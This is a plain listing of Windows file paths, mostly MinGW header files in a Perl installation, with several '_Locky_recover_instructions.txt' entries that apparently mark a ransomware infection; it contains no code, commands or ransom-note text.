c:\Perl\c\i686-w64-mingw32\include\mmsystem.h<br />
c:\Perl\c\i686-w64-mingw32\include\mobsync.h<br />
c:\Perl\c\i686-w64-mingw32\include\moniker.h<br />
c:\Perl\c\i686-w64-mingw32\include\mprapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mprerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\mq.h<br />
c:\Perl\c\i686-w64-mingw32\include\mqmail.h<br />
c:\Perl\c\i686-w64-mingw32\include\mqoai.h<br />
c:\Perl\c\i686-w64-mingw32\include\msacm.h<br />
c:\Perl\c\i686-w64-mingw32\include\msacmdlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\msado15.h<br />
c:\Perl\c\i686-w64-mingw32\include\msasn1.h<br />
c:\Perl\c\i686-w64-mingw32\include\msber.h<br />
c:\Perl\c\i686-w64-mingw32\include\mschapp.h<br />
c:\Perl\c\i686-w64-mingw32\include\msclus.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdadc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaipp.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaipper.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaora.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdaosp.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdasc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdasql.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdatsrc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msdshape.h<br />
c:\Perl\c\i686-w64-mingw32\include\msfs.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmcid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmdid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mshtmhst.h<br />
c:\Perl\perl\lib\CORE\dirent.h<br />
c:\Perl\perl\lib\CORE\cv.h<br />
c:\Perl\c\i686-w64-mingw32\include\msi.h<br />
c:\Perl\c\i686-w64-mingw32\include\msidefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\msimcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\msimcsdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\msiquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\msoav.h<br />
c:\Perl\c\i686-w64-mingw32\include\msp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspab.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspaddr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspcall.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspcoll.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspenum.h<br />
c:\Perl\c\i686-w64-mingw32\include\msplog.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspst.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspstrm.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspterm.h<br />
c:\Perl\c\i686-w64-mingw32\include\mspthrd.h<br />
c:\Perl\c\i686-w64-mingw32\include\msptrmac.h<br />
c:\Perl\c\i686-w64-mingw32\include\msptrmar.h<br />
c:\Perl\c\i686-w64-mingw32\include\msptrmvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\msputils.h<br />
c:\Perl\c\i686-w64-mingw32\include\msremote.h<br />
c:\Perl\c\i686-w64-mingw32\include\mssip.h<br />
c:\Perl\c\i686-w64-mingw32\include\msstkppg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mstask.h<br />
c:\Perl\c\i686-w64-mingw32\include\mstcpip.h<br />
c:\Perl\c\i686-w64-mingw32\include\msterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mswsock.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxml.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxml2.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxml2did.h<br />
c:\Perl\c\i686-w64-mingw32\include\msxmldid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtsadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtsadmin_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\mtsevents.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtsgrp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtx.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtxadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtxadmin_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\mtxattr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mtxdm.h<br />
c:\Perl\c\i686-w64-mingw32\include\multimon.h<br />
c:\Perl\c\i686-w64-mingw32\include\multinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\nb30.h<br />
c:\Perl\c\i686-w64-mingw32\include\ndr64types.h<br />
c:\Perl\c\i686-w64-mingw32\include\ndrtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\netcon.h<br />
c:\Perl\c\i686-w64-mingw32\include\neterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\netmon.h<br />
c:\Perl\c\i686-w64-mingw32\include\netprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\new.h<br />
c:\Perl\c\i686-w64-mingw32\include\newapis.h<br />
c:\Perl\c\i686-w64-mingw32\include\nmsupp.h<br />
c:\Perl\c\i686-w64-mingw32\include\npapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\nspapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntddndis.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntddpsch.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntddscsi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntdsapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntdsbcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntdsbmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntgdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntldap.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntmsapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntmsmli.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntsdexts.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntsecapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntsecpkg.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntstatus.h<br />
c:\Perl\c\i686-w64-mingw32\include\ntverp.h<br />
c:\Perl\c\i686-w64-mingw32\include\oaidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\objbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\objerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\objidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\objsafe.h<br />
c:\Perl\c\i686-w64-mingw32\include\objsel.h<br />
c:\Perl\c\i686-w64-mingw32\include\ocidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\ocmm.h<br />
c:\Perl\c\i686-w64-mingw32\include\odbcinst.h<br />
c:\Perl\c\i686-w64-mingw32\include\odbcss.h<br />
c:\Perl\c\i686-w64-mingw32\include\ole.h<br />
c:\Perl\c\i686-w64-mingw32\include\ole2.h<br />
c:\Perl\c\i686-w64-mingw32\include\ole2ver.h<br />
c:\Perl\c\i686-w64-mingw32\include\oleacc.h<br />
c:\Perl\c\i686-w64-mingw32\include\oleauto.h<br />
c:\Perl\c\i686-w64-mingw32\include\olectl.h<br />
c:\Perl\c\i686-w64-mingw32\include\olectlid.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledb.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledbdep.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledberr.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledbguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\oledlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\oleidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\oletx2xa.h<br />
c:\Perl\c\i686-w64-mingw32\include\omp.h<br />
c:\Perl\c\i686-w64-mingw32\include\parser.h<br />
c:\Perl\c\i686-w64-mingw32\include\patchapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\patchwiz.h<br />
c:\Perl\c\i686-w64-mingw32\include\pbt.h<br />
c:\Perl\c\i686-w64-mingw32\include\pchannel.h<br />
c:\Perl\c\i686-w64-mingw32\include\pcrt32.h<br />
c:\Perl\c\i686-w64-mingw32\include\pdh.h<br />
c:\Perl\c\i686-w64-mingw32\include\pdhmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\penwin.h<br />
c:\Perl\c\i686-w64-mingw32\include\perhist.h<br />
c:\Perl\c\i686-w64-mingw32\include\persist.h<br />
c:\Perl\c\i686-w64-mingw32\include\pgobootrun.h<br />
c:\Perl\c\i686-w64-mingw32\include\polarity.h<br />
c:\Perl\c\i686-w64-mingw32\include\poppack.h<br />
c:\Perl\c\i686-w64-mingw32\include\powrprof.h<br />
c:\Perl\c\i686-w64-mingw32\include\process.h<br />
c:\Perl\c\i686-w64-mingw32\include\profile.h<br />
c:\Perl\c\i686-w64-mingw32\include\profinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\propidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\prsht.h<br />
c:\Perl\c\i686-w64-mingw32\include\psapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack1.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack2.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack4.h<br />
c:\Perl\c\i686-w64-mingw32\include\pshpack8.h<br />
c:\Perl\c\i686-w64-mingw32\include\pstore.h<br />
c:\Perl\c\i686-w64-mingw32\include\qmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\qnetwork.h<br />
c:\Perl\c\i686-w64-mingw32\include\qos.h<br />
c:\Perl\c\i686-w64-mingw32\include\qosname.h<br />
c:\Perl\c\i686-w64-mingw32\include\qospol.h<br />
c:\Perl\c\i686-w64-mingw32\include\qossp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ras.h<br />
c:\Perl\c\i686-w64-mingw32\include\rasdlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\raseapif.h<br />
c:\Perl\c\i686-w64-mingw32\include\raserror.h<br />
c:\Perl\c\i686-w64-mingw32\include\rassapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\rasshost.h<br />
c:\Perl\c\i686-w64-mingw32\include\ratings.h<br />
c:\Perl\c\i686-w64-mingw32\include\reason.h<br />
c:\Perl\c\i686-w64-mingw32\include\recguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\reconcil.h<br />
c:\Perl\c\i686-w64-mingw32\include\regstr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rend.h<br />
c:\Perl\c\i686-w64-mingw32\include\resapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\richedit.h<br />
c:\Perl\c\i686-w64-mingw32\include\richole.h<br />
c:\Perl\c\i686-w64-mingw32\include\rkeysvcc.h<br />
c:\Perl\c\i686-w64-mingw32\include\rnderr.h<br />
c:\Perl\c\i686-w64-mingw32\include\routprot.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpc.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcasync.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcdce.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcdcep.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcndr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcnsi.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcnsip.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcnterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcproxy.h<br />
c:\Perl\c\i686-w64-mingw32\include\rpcssl.h<br />
c:\Perl\c\i686-w64-mingw32\include\rrascfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtcapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtccore.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtcerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtm.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtmv2.h<br />
c:\Perl\c\i686-w64-mingw32\include\rtutils.h<br />
c:\Perl\c\i686-w64-mingw32\include\scarddat.h<br />
c:\Perl\c\i686-w64-mingw32\include\scarderr.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardsrv.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardssp.h<br />
c:\Perl\c\i686-w64-mingw32\include\scardssp_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\scardssp_p.c<br />
c:\Perl\c\i686-w64-mingw32\include\scesvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\schannel.h<br />
c:\Perl\c\i686-w64-mingw32\include\schedule.h<br />
c:\Perl\c\i686-w64-mingw32\include\schemadef.h<br />
c:\Perl\c\i686-w64-mingw32\include\schnlsp.h<br />
c:\Perl\c\i686-w64-mingw32\include\scode.h<br />
c:\Perl\c\i686-w64-mingw32\include\scrnsave.h<br />
c:\Perl\c\i686-w64-mingw32\include\scrptids.h<br />
c:\Perl\c\i686-w64-mingw32\include\sddl.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdkddkver.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdks\_mingw_directx.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdks\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sdoias.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdpblb.h<br />
c:\Perl\c\i686-w64-mingw32\include\sdperr.h<br />
c:\Perl\c\i686-w64-mingw32\include\search.h<br />
c:\Perl\c\i686-w64-mingw32\include\secext.h<br />
c:\Perl\c\i686-w64-mingw32\include\security.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\conio_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\crtdbg_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\io_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\mbstring_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\search_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\stdio_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\stdlib_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\stralign_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\string_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys\timeb_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\sys\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\tchar_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\time_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sec_api\wchar_s.h<br />
c:\Perl\c\i686-w64-mingw32\include\sehmap.h<br />
c:\Perl\c\i686-w64-mingw32\include\sens.h<br />
c:\Perl\c\i686-w64-mingw32\include\sensapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sensevts.h<br />
c:\Perl\c\i686-w64-mingw32\include\servprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\setjmp.h<br />
c:\Perl\c\i686-w64-mingw32\include\setjmpex.h<br />
c:\Perl\c\i686-w64-mingw32\include\setupapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sfc.h<br />
c:\Perl\c\i686-w64-mingw32\include\shappmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\share.h<br />
c:\Perl\c\i686-w64-mingw32\include\shdeprecated.h<br />
c:\Perl\c\i686-w64-mingw32\include\shdispid.h<br />
c:\Perl\c\i686-w64-mingw32\include\shellapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\shfolder.h<br />
c:\Perl\c\i686-w64-mingw32\include\shldisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\shlguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\shlobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\shlwapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\shobjidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\shtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\signal.h<br />
c:\Perl\c\i686-w64-mingw32\include\simpdata.h<br />
c:\Perl\c\i686-w64-mingw32\include\simpdc.h<br />
c:\Perl\c\i686-w64-mingw32\include\sipbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\sisbkup.h<br />
c:\Perl\c\i686-w64-mingw32\include\smpab.h<br />
c:\Perl\c\i686-w64-mingw32\include\smpms.h<br />
c:\Perl\c\i686-w64-mingw32\include\smpxp.h<br />
c:\Perl\c\i686-w64-mingw32\include\smtpguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\smx.h<br />
c:\Perl\c\i686-w64-mingw32\include\snmp.h<br />
c:\Perl\c\i686-w64-mingw32\include\softpub.h<br />
c:\Perl\c\i686-w64-mingw32\include\specstrings.h<br />
c:\Perl\c\i686-w64-mingw32\include\sporder.h<br />
c:\Perl\c\i686-w64-mingw32\include\sql.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqlext.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqloledb.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqltypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\sqlucode.h<br />
c:\Perl\c\i686-w64-mingw32\include\sql_1.h<br />
c:\Perl\c\i686-w64-mingw32\include\srrestoreptapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\srv.h<br />
c:\Perl\licenses\License.rtf<br />
c:\Perl\licenses\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sspi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sspserr.h<br />
c:\Perl\c\i686-w64-mingw32\include\sspsidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdarg.h<br />
c:\Perl\c\i686-w64-mingw32\include\stddef.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdexcpt.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdint.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdio.h<br />
c:\Perl\c\i686-w64-mingw32\include\stdlib.h<br />
c:\Perl\c\i686-w64-mingw32\include\sti.h<br />
c:\Perl\c\i686-w64-mingw32\include\stierr.h<br />
c:\Perl\c\i686-w64-mingw32\include\stireg.h<br />
c:\Perl\c\i686-w64-mingw32\include\stllock.h<br />
c:\Perl\c\i686-w64-mingw32\include\stm.h<br />
c:\Perl\c\i686-w64-mingw32\include\storage.h<br />
c:\Perl\c\i686-w64-mingw32\include\storprop.h<br />
c:\Perl\c\i686-w64-mingw32\include\stralign.h<br />
c:\Perl\c\i686-w64-mingw32\include\string.h<br />
c:\Perl\c\i686-w64-mingw32\include\strings.h<br />
c:\Perl\c\i686-w64-mingw32\include\strmif.h<br />
c:\Perl\c\i686-w64-mingw32\include\strsafe.h<br />
c:\Perl\c\i686-w64-mingw32\include\subauth.h<br />
c:\Perl\c\i686-w64-mingw32\include\subsmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\svcguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\svrapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\cdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\sys\fcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\file.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\ioctl.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\locking.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\param.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\stat.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\time.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\timeb.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\types.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\unistd.h<br />
c:\Perl\c\i686-w64-mingw32\include\sys\utime.h<br />
c:\Perl\c\i686-w64-mingw32\include\syslimits.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3cc.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3ds.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3err.h<br />
c:\Perl\c\i686-w64-mingw32\include\tapi3if.h<br />
c:\Perl\c\i686-w64-mingw32\include\tcerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\tcguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\tchar.h<br />
c:\Perl\c\i686-w64-mingw32\include\termmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\textserv.h<br />
c:\Perl\c\i686-w64-mingw32\include\time.h<br />
c:\Perl\c\i686-w64-mingw32\include\timeprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\tlhelp32.h<br />
c:\Perl\c\i686-w64-mingw32\include\tlogstg.h<br />
c:\Perl\c\i686-w64-mingw32\include\tmschema.h<br />
c:\Perl\c\i686-w64-mingw32\include\tnef.h<br />
c:\Perl\c\i686-w64-mingw32\include\tom.h<br />
c:\Perl\c\i686-w64-mingw32\include\traffic.h<br />
c:\Perl\c\i686-w64-mingw32\include\transact.h<br />
c:\Perl\c\i686-w64-mingw32\include\triedcid.h<br />
c:\Perl\c\i686-w64-mingw32\include\triediid.h<br />
c:\Perl\c\i686-w64-mingw32\include\triedit.h<br />
c:\Perl\c\i686-w64-mingw32\include\tspi.h<br />
c:\Perl\c\i686-w64-mingw32\include\tsuserex.h<br />
c:\Perl\c\i686-w64-mingw32\include\tsuserex_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\tvout.h<br />
c:\Perl\c\i686-w64-mingw32\include\txcoord.h<br />
c:\Perl\c\i686-w64-mingw32\include\txctx.h<br />
c:\Perl\c\i686-w64-mingw32\include\txdtc.h<br />
c:\Perl\c\i686-w64-mingw32\include\typeinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\uastrfnc.h<br />
c:\Perl\c\i686-w64-mingw32\include\umx.h<br />
c:\Perl\c\i686-w64-mingw32\include\unistd.h<br />
c:\Perl\c\i686-w64-mingw32\include\unknwn.h<br />
c:\Perl\c\i686-w64-mingw32\include\urlhist.h<br />
c:\Perl\c\i686-w64-mingw32\include\urlmon.h<br />
c:\Perl\c\i686-w64-mingw32\include\userenv.h<br />
c:\Perl\c\i686-w64-mingw32\include\usp10.h<br />
c:\Perl\c\i686-w64-mingw32\include\utime.h<br />
c:\Perl\c\i686-w64-mingw32\include\uuids.h<br />
c:\Perl\c\i686-w64-mingw32\include\uxtheme.h<br />
c:\Perl\c\i686-w64-mingw32\include\vadefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\varargs.h<br />
c:\Perl\c\i686-w64-mingw32\include\vcr.h<br />
c:\Perl\c\i686-w64-mingw32\include\vdmdbg.h<br />
c:\Perl\c\i686-w64-mingw32\include\vfw.h<br />
c:\Perl\c\i686-w64-mingw32\include\vfwmsgs.h<br />
c:\Perl\c\i686-w64-mingw32\include\vmr9.h<br />
c:\Perl\c\i686-w64-mingw32\include\w32api.h<br />
c:\Perl\c\i686-w64-mingw32\include\wab.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabcode.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabiab.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabmem.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabnot.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabtags.h<br />
c:\Perl\c\i686-w64-mingw32\include\wabutil.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemads.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemdisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemidl.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\wbemtran.h<br />
c:\Perl\c\i686-w64-mingw32\include\wchar.h<br />
c:\Perl\c\i686-w64-mingw32\include\wctype.h<br />
c:\Perl\c\i686-w64-mingw32\include\wfext.h<br />
c:\Perl\c\i686-w64-mingw32\include\wia.h<br />
c:\Perl\c\i686-w64-mingw32\include\wiadef.h<br />
c:\Perl\c\i686-w64-mingw32\include\wiadevd.h<br />
c:\Perl\c\i686-w64-mingw32\include\wiavideo.h<br />
c:\Perl\c\i686-w64-mingw32\include\winable.h<br />
c:\Perl\c\i686-w64-mingw32\include\winbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\winber.h<br />
c:\Perl\c\i686-w64-mingw32\include\wincon.h<br />
c:\Perl\c\i686-w64-mingw32\include\wincred.h<br />
c:\Perl\c\i686-w64-mingw32\include\wincrypt.h<br />
c:\Perl\c\i686-w64-mingw32\include\windef.h<br />
c:\Perl\c\i686-w64-mingw32\include\windns.h<br />
c:\Perl\c\i686-w64-mingw32\include\windows.h<br />
c:\Perl\c\i686-w64-mingw32\include\windowsx.h<br />
c:\Perl\c\i686-w64-mingw32\include\winefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\winerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\wingdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wininet.h<br />
c:\Perl\c\i686-w64-mingw32\include\winioctl.h<br />
c:\Perl\c\i686-w64-mingw32\include\winldap.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnetwk.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnls.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnls32.h<br />
c:\Perl\c\i686-w64-mingw32\include\winnt.h<br />
c:\Perl\c\i686-w64-mingw32\include\winperf.h<br />
c:\Perl\c\i686-w64-mingw32\include\winreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\winresrc.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsafer.h<br />
c:\Perl\c\i686-w64-mingw32\include\winscard.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsmcrd.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsnmp.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsock.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsock2.h<br />
c:\Perl\c\i686-w64-mingw32\include\winspool.h<br />
c:\Perl\c\i686-w64-mingw32\include\winsvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\winternl.h<br />
c:\Perl\c\i686-w64-mingw32\include\wintrust.h<br />
c:\Perl\c\i686-w64-mingw32\include\winuser.h<br />
c:\Perl\c\i686-w64-mingw32\include\winver.h<br />
c:\Perl\c\i686-w64-mingw32\include\winwlx.h<br />
c:\Perl\c\i686-w64-mingw32\include\wmiatlprov.h<br />
c:\Perl\c\i686-w64-mingw32\include\wmistr.h<br />
c:\Perl\c\i686-w64-mingw32\include\wmiutils.h<br />
c:\Perl\c\i686-w64-mingw32\include\wownt16.h<br />
c:\Perl\c\i686-w64-mingw32\include\wownt32.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpapimsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpcrsmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpftpmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wppstmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpspihlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\wptypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\wpwizmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2atm.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2dnet.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2ipdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2spi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ws2tcpip.h<br />
c:\Perl\c\i686-w64-mingw32\include\wshisotp.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsipv6ok.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsipx.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsnetbs.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsnwlink.h<br />
c:\Perl\c\i686-w64-mingw32\include\wspiapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsrm.h<br />
c:\Perl\c\i686-w64-mingw32\include\wsvns.h<br />
c:\Perl\c\i686-w64-mingw32\include\wtsapi32.h<br />
c:\Perl\c\i686-w64-mingw32\include\wtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\xa.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmc.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmcext.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmcmsx2.h<br />
c:\Perl\c\i686-w64-mingw32\include\xcmcmsxt.h<br />
c:\Perl\c\i686-w64-mingw32\include\xenroll.h<br />
c:\Perl\c\i686-w64-mingw32\include\xlocinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmath.h<br />
